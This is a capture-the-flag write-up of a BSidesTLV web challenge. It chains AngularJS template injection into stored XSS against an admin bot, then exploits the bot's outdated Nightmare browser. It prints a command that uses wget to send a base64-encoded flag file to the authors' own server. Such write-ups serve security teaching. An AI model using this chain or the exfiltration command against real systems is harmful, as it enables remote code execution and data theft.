By Yaakov Cohen and Narcissus


The link leads us to a video game store site:


We logged in with the credentials in the challenge info and looked around. We noticed that in the products pages we could edit the games description:


We wanted to see if we could use some sort of xss and after looking around a bit we found out that the site uses AngularJS. We also found a nice article describing how to escape the expression sandbox. As you can see in the above picture the description is 2, but we actually put {{1+1}}. So we know that we can take advantage of stored xss. Now let's see if we can get the bot to go to our site. We changed the description and put the following code:


Watching the server logs we got a request from the bot after about half a minute, great he clicks out links. Now we need to find a way to get information from him.

We gathered some information on the bot. For example his user agent:


The browser he uses is Nightmare/2.10.0, that's a pretty old version. With that information we searched to see if we could find some vulnerabilities and we did! Lucky us.

We created a page on our server using the code from the github we linked to and tried to get the bot to go to the new page.

The code tries to take advantage of a known vulnerability and to get the target to connect to a server using netcat. We set our server up to listen to the port we configured and waited. The bot did go to our new page, but nothing came over our netcat server so we had to try something else.

Instead of using netcat we found out you can use wget and encode the data we want to send in base64 and append it to the url. Just to see if it works we tried using the ls command:


Then half a minute later looking at our server we got a request with a long base64 encoded string, we decoded it and got:


Good it works, now to send my new favourite command. We changed value in the previous code to: "wget http://my_ip:8080/?data=$(/bin/cat $(find / -name flag.txt) | base64 -w 0)" and again after a few seconds we got a request with QlNpZGVzVExWe0FuZ3VsYXJqU19pc19GcmVkZHlfS3J1ZWdlcn0KQlNpZGVzVExWe0FuZ3VsYXJqU19pc19GcmVkZHlfS3J1ZWdlcn0K which decodes to: BSidesTLV{AngularjS_is_Freddy_Krueger}. (Well actually it decodes to the flag twice, but we only need one copy.)